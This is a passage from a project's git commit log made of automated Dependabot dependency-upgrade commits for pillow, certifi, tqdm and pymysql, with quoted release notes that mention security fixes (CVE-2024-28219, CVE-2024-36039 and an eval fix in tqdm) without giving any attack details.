href="https://redirect.github.com/python-pillow/Pillow/issues/7928">#7928</a>
[<a href="https://github.com/hugovk"><code>@​hugovk</code></a>]</li>
<li>Use <code>functools.lru_cache</code> for <code>hopper()</code> <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7912">#7912</a>
[<a href="https://github.com/hugovk"><code>@​hugovk</code></a>]</li>
<li>Raise ValueError if seeking to greater than offset-sized integer in
TIFF <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7883">#7883</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Improve speed of loading QOI images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7925">#7925</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Added RGB to I;16N conversion <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7920">#7920</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Add --report argument to <strong>main</strong>.py to omit supported
formats <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7818">#7818</a>
[<a href="https://github.com/nulano"><code>@​nulano</code></a>]</li>
<li>Added RGB to I;16, I;16L and I;16B conversion <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7918">#7918</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fix editable installation with custom build backend and
configuration options <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7658">#7658</a>
[<a href="https://github.com/nulano"><code>@​nulano</code></a>]</li>
<li>Fix putdata() for I;16N on big-endian <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7209">#7209</a>
[<a href="https://github.com/Yay295"><code>@​Yay295</code></a>]</li>
<li>Determine MPO size from markers, not EXIF data <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7884">#7884</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Improved conversion from RGB to RGBa, LA and La <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7888">#7888</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Support FITS images with GZIP_1 compression <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7894">#7894</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use I;16 mode for 9-bit JPEG 2000 images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7900">#7900</a>
[<a
href="https://github.com/scaramallion"><code>@​scaramallion</code></a>]</li>
<li>Raise ValueError if kmeans is negative <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7891">#7891</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Remove TIFF tag OSUBFILETYPE when saving using libtiff <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7893">#7893</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Raise ValueError for negative values when loading P1-P3 PPM images
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7882">#7882</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Added reading of JPEG2000 palettes <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7870">#7870</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Added alpha_quality argument when saving WebP images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7872">#7872</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fixed joined corners for ImageDraw rounded_rectangle() non-integer
dimensions <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7881">#7881</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Removed Python and NumPy pinning on Cygwin <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7880">#7880</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Update UnidentifiedImageError and <strong>version</strong> imports
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7644">#7644</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Stop reading EPS image at EOF marker <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7753">#7753</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>PSD layer co-ordinates may be negative <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7706">#7706</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7791">#7791</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>When saving GIF frame that restores to background color, do not fill
identical pixels <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7788">#7788</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fixed reading PNG iCCP compression method <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7823">#7823</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Allow writing IFDRational to UNDEFINED tag <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7840">#7840</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fix logged tag name when loading Exif data <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7842">#7842</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use maximum frame size in IHDR chunk when saving APNG images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7821">#7821</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Prevent opening P TGA images without a palette <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7797">#7797</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use palette when loading ICO images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7798">#7798</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Use consistent arguments for load_read and load_seek <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7713">#7713</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Turn off nullability warnings for macOS SDK <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7827">#7827</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fix shift-sign issue in Convert.c <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7838">#7838</a>
[<a href="https://github.com/r-barnes"><code>@​r-barnes</code></a>]</li>
<li>winbuild: Refactor dependency versions into constants <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7843">#7843</a>
[<a href="https://github.com/hugovk"><code>@​hugovk</code></a>]</li>
<li>Build macOS arm64 wheels natively <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7852">#7852</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Fixed typo <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7855">#7855</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Open 16-bit grayscale PNGs as I;16 <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7849">#7849</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Handle truncated chunks at the end of PNG images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7709">#7709</a>
[<a href="https://github.com/lajiyuan"><code>@​lajiyuan</code></a>]</li>
<li>Match mask size to pasted image size in GifImagePlugin <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7779">#7779</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Changed SupportsGetMesh protocol to be public <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7841">#7841</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Release GIL while calling <code>WebPAnimDecoderGetNext</code> <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7782">#7782</a>
[<a
href="https://github.com/evanmiller"><code>@​evanmiller</code></a>]</li>
<li>Fixed reading FLI/FLC images with a prefix chunk <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7804">#7804</a>
[<a href="https://github.com/twolife"><code>@​twolife</code></a>]</li>
<li>Updated package name for Tidelift <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7810">#7810</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
<li>Removed unused code <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7744">#7744</a>
[<a
href="https://github.com/radarhere"><code>@​radarhere</code></a>]</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst">pillow's
changelog</a>.</em></p>
<blockquote>
<h2>10.3.0 (2024-04-01)</h2>
<ul>
<li>
<p>CVE-2024-28219: Use <code>strncpy</code> to avoid buffer overflow <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7928">#7928</a>
[radarhere, hugovk]</p>
</li>
<li>
<p>Deprecate <code>eval()</code>, replacing it with
<code>lambda_eval()</code> and <code>unsafe_eval()</code> <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7927">#7927</a>
[radarhere, hugovk]</p>
</li>
<li>
<p>Raise <code>ValueError</code> if seeking to greater than offset-sized
integer in TIFF <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7883">#7883</a>
[radarhere]</p>
</li>
<li>
<p>Add <code>--report</code> argument to <code>__main__.py</code> to
omit supported formats <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7818">#7818</a>
[nulano, radarhere, hugovk]</p>
</li>
<li>
<p>Added RGB to I;16, I;16L, I;16B and I;16N conversion <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7918">#7918</a>,
<a
href="https://redirect.github.com/python-pillow/Pillow/issues/7920">#7920</a>
[radarhere]</p>
</li>
<li>
<p>Fix editable installation with custom build backend and configuration
options <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7658">#7658</a>
[nulano, radarhere]</p>
</li>
<li>
<p>Fix putdata() for I;16N on big-endian <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7209">#7209</a>
[Yay295, hugovk, radarhere]</p>
</li>
<li>
<p>Determine MPO size from markers, not EXIF data <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7884">#7884</a>
[radarhere]</p>
</li>
<li>
<p>Improved conversion from RGB to RGBa, LA and La <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7888">#7888</a>
[radarhere]</p>
</li>
<li>
<p>Support FITS images with GZIP_1 compression <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7894">#7894</a>
[radarhere]</p>
</li>
<li>
<p>Use I;16 mode for 9-bit JPEG 2000 images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7900">#7900</a>
[scaramallion, radarhere]</p>
</li>
<li>
<p>Raise ValueError if kmeans is negative <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7891">#7891</a>
[radarhere]</p>
</li>
<li>
<p>Remove TIFF tag OSUBFILETYPE when saving using libtiff <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7893">#7893</a>
[radarhere]</p>
</li>
<li>
<p>Raise ValueError for negative values when loading P1-P3 PPM images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7882">#7882</a>
[radarhere]</p>
</li>
<li>
<p>Added reading of JPEG2000 palettes <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7870">#7870</a>
[radarhere]</p>
</li>
<li>
<p>Added alpha_quality argument when saving WebP images <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7872">#7872</a>
[radarhere]</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="5c89d88eee"><code>5c89d88</code></a>
10.3.0 version bump</li>
<li><a
href="63cbfcfdea"><code>63cbfcf</code></a>
Update CHANGES.rst [ci skip]</li>
<li><a
href="2776126aa9"><code>2776126</code></a>
Merge pull request <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7928">#7928</a>
from python-pillow/lcms</li>
<li><a
href="aeb51cbb16"><code>aeb51cb</code></a>
Merge branch 'main' into lcms</li>
<li><a
href="5beb0b6664"><code>5beb0b6</code></a>
Update CHANGES.rst [ci skip]</li>
<li><a
href="cac6ffa7b3"><code>cac6ffa</code></a>
Merge pull request <a
href="https://redirect.github.com/python-pillow/Pillow/issues/7927">#7927</a>
from python-pillow/imagemath</li>
<li><a
href="f5eeeacf75"><code>f5eeeac</code></a>
Name as 'options' in lambda_eval and unsafe_eval, but '_dict' in
deprecated eval</li>
<li><a
href="facf3af93d"><code>facf3af</code></a>
Added release notes</li>
<li><a
href="2a93aba5cf"><code>2a93aba</code></a>
Use strncpy to avoid buffer overflow</li>
<li><a
href="a670597bc3"><code>a670597</code></a>
Update CHANGES.rst [ci skip]</li>
<li>Additional commits viewable in <a
href="https://github.com/python-pillow/Pillow/compare/10.2.0...10.3.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pillow&package-manager=pip&previous-version=10.2.0&new-version=10.3.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:07:28 +08:00
d69f4ec829 build(deps): bump certifi from 2024.2.2 to 2024.7.4 (#1680)
Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.2.2
to 2024.7.4.
<details>
<summary>Commits</summary>
<ul>
<li><a
href="bd8153872e"><code>bd81538</code></a>
2024.07.04 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/295">#295</a>)</li>
<li><a
href="06a2cbf21f"><code>06a2cbf</code></a>
Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/294">#294</a>)</li>
<li><a
href="13bba02b72"><code>13bba02</code></a>
Bump actions/checkout from 4.1.6 to 4.1.7 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/293">#293</a>)</li>
<li><a
href="e8abcd0e62"><code>e8abcd0</code></a>
Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/292">#292</a>)</li>
<li><a
href="124f4adf17"><code>124f4ad</code></a>
2024.06.02 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/291">#291</a>)</li>
<li><a
href="c2196ce5d6"><code>c2196ce</code></a>
--- (<a
href="https://redirect.github.com/certifi/python-certifi/issues/290">#290</a>)</li>
<li><a
href="fefdeec758"><code>fefdeec</code></a>
Bump actions/checkout from 4.1.4 to 4.1.5 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/289">#289</a>)</li>
<li><a
href="3c5fb1560b"><code>3c5fb15</code></a>
Bump actions/download-artifact from 4.1.6 to 4.1.7 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/286">#286</a>)</li>
<li><a
href="4a9569a3eb"><code>4a9569a</code></a>
Bump actions/checkout from 4.1.2 to 4.1.4 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/287">#287</a>)</li>
<li><a
href="1fc808626a"><code>1fc8086</code></a>
Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (<a
href="https://redirect.github.com/certifi/python-certifi/issues/288">#288</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/certifi/python-certifi/compare/2024.02.02...2024.07.04">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=certifi&package-manager=pip&previous-version=2024.2.2&new-version=2024.7.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:06:03 +08:00
ef45526700 build(deps): bump tqdm from 4.66.2 to 4.66.3 (#1681)
Bumps [tqdm](https://github.com/tqdm/tqdm) from 4.66.2 to 4.66.3.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/tqdm/tqdm/releases">tqdm's
releases</a>.</em></p>
<blockquote>
<h2>tqdm v4.66.3 stable</h2>
<ul>
<li><code>cli</code>: <code>eval</code> safety (fixes CVE-2024-34062,
GHSA-g7vv-2v7x-gj9p)</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="4e613f84ed"><code>4e613f8</code></a>
Merge pull request from GHSA-g7vv-2v7x-gj9p</li>
<li><a
href="b53348c730"><code>b53348c</code></a>
cli: eval safety</li>
<li>See full diff in <a
href="https://github.com/tqdm/tqdm/compare/v4.66.2...v4.66.3">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=tqdm&package-manager=pip&previous-version=4.66.2&new-version=4.66.3)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:05:38 +08:00
79034bd194 build(deps): bump pymysql from 1.1.0 to 1.1.1 (#1664)
Bumps [pymysql](https://github.com/PyMySQL/PyMySQL) from 1.1.0 to 1.1.1.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/PyMySQL/PyMySQL/releases">pymysql's
releases</a>.</em></p>
<blockquote>
<h2>v1.1.1</h2>
<blockquote>
<p>[!WARNING]
This release fixes a vulnerability (CVE-2024-36039).
All users are recommended to update to this version.</p>
<p>If you can not update soon, check the input value from untrusted
source has an expected type.
Only dict input from untrusted source can be an attack vector.</p>
</blockquote>
<h2>What's Changed</h2>
<ul>
<li>Prohibit dict parameter for <code>Cursor.execute()</code>. It didn't
produce valid SQL
and might cause SQL injection. (CVE-2024-36039)</li>
<li>Added ssl_key_password param by <a
href="https://github.com/svaskov"><code>@​svaskov</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1145">PyMySQL/PyMySQL#1145</a></li>
</ul>
<h2>Merged PRs</h2>
<ul>
<li>Add support for Python 3.12 by <a
href="https://github.com/hugovk"><code>@​hugovk</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1134">PyMySQL/PyMySQL#1134</a></li>
<li>chore(deps): update actions/checkout action to v4 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1136">PyMySQL/PyMySQL#1136</a></li>
<li>Update codecov/codecov-action action to v4 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1137">PyMySQL/PyMySQL#1137</a></li>
<li>ci: use codecov@v3 by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1142">PyMySQL/PyMySQL#1142</a></li>
<li>chore(deps): update dessant/lock-threads action to v5 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1141">PyMySQL/PyMySQL#1141</a></li>
<li>doc: use rtd theme by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1143">PyMySQL/PyMySQL#1143</a></li>
<li>use Ruff as formatter by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1144">PyMySQL/PyMySQL#1144</a></li>
<li>chore(deps): update dependency sphinx-rtd-theme to v2 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1147">PyMySQL/PyMySQL#1147</a></li>
<li>chore(deps): update actions/setup-python action to v5 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1152">PyMySQL/PyMySQL#1152</a></li>
<li>chore(deps): update github/codeql-action action to v3 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1154">PyMySQL/PyMySQL#1154</a></li>
<li>chore(deps): update codecov/codecov-action action to v4 by <a
href="https://github.com/renovate"><code>@​renovate</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1158">PyMySQL/PyMySQL#1158</a></li>
<li>Support error packet without sqlstate by <a
href="https://github.com/methane"><code>@​methane</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1160">PyMySQL/PyMySQL#1160</a></li>
<li>test json - mariadb without JSON type by <a
href="https://github.com/grooverdan"><code>@​grooverdan</code></a> in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1165">PyMySQL/PyMySQL#1165</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a href="https://github.com/hugovk"><code>@​hugovk</code></a> made
their first contribution in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1134">PyMySQL/PyMySQL#1134</a></li>
<li><a href="https://github.com/svaskov"><code>@​svaskov</code></a> made
their first contribution in <a
href="https://redirect.github.com/PyMySQL/PyMySQL/pull/1145">PyMySQL/PyMySQL#1145</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/PyMySQL/PyMySQL/compare/v1.1.0...v1.1.1">https://github.com/PyMySQL/PyMySQL/compare/v1.1.0...v1.1.1</a></p>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/PyMySQL/PyMySQL/blob/main/CHANGELOG.md">pymysql's
changelog</a>.</em></p>
<blockquote>
<h2>v1.1.1</h2>
<p>Release date: 2024-05-21</p>
<blockquote>
<p>[!WARNING]
This release fixes a vulnerability (CVE-2024-36039).
All users are recommended to update to this version.</p>
<p>If you can not update soon, check the input value from
untrusted source has an expected type. Only dict input
from untrusted source can be an attack vector.</p>
</blockquote>
<ul>
<li>Prohibit dict parameter for <code>Cursor.execute()</code>. It didn't
produce valid SQL
and might cause SQL injection. (CVE-2024-36039)</li>
<li>Added ssl_key_password param. <a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1145">#1145</a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="2cab9ecc64"><code>2cab9ec</code></a>
v1.1.1</li>
<li><a
href="521e40050c"><code>521e400</code></a>
forbid dict parameter</li>
<li><a
href="7f032a699d"><code>7f032a6</code></a>
remove coveralls from requirements</li>
<li><a
href="69f6c7439b"><code>69f6c74</code></a>
ruff format</li>
<li><a
href="b4ed6884a1"><code>b4ed688</code></a>
test json - mariadb without JSON type (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1165">#1165</a>)</li>
<li><a
href="bbd049f40d"><code>bbd049f</code></a>
Support error packet without sqlstate (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1160">#1160</a>)</li>
<li><a
href="9694747ae6"><code>9694747</code></a>
pyupgrade</li>
<li><a
href="1f0b7856de"><code>1f0b785</code></a>
chore(deps): update codecov/codecov-action action to v4 (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1158">#1158</a>)</li>
<li><a
href="1e28be81c2"><code>1e28be8</code></a>
chore(deps): update github/codeql-action action to v3 (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1154">#1154</a>)</li>
<li><a
href="f13f054abc"><code>f13f054</code></a>
chore(deps): update actions/setup-python action to v5 (<a
href="https://redirect.github.com/PyMySQL/PyMySQL/issues/1152">#1152</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/PyMySQL/PyMySQL/compare/v1.1.0...v1.1.1">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pymysql&package-manager=pip&previous-version=1.1.0&new-version=1.1.1)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:05:14 +08:00
60356b52c6 Feat stepfun (#1659)
### What problem does this PR solve?

#1661
#1660

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

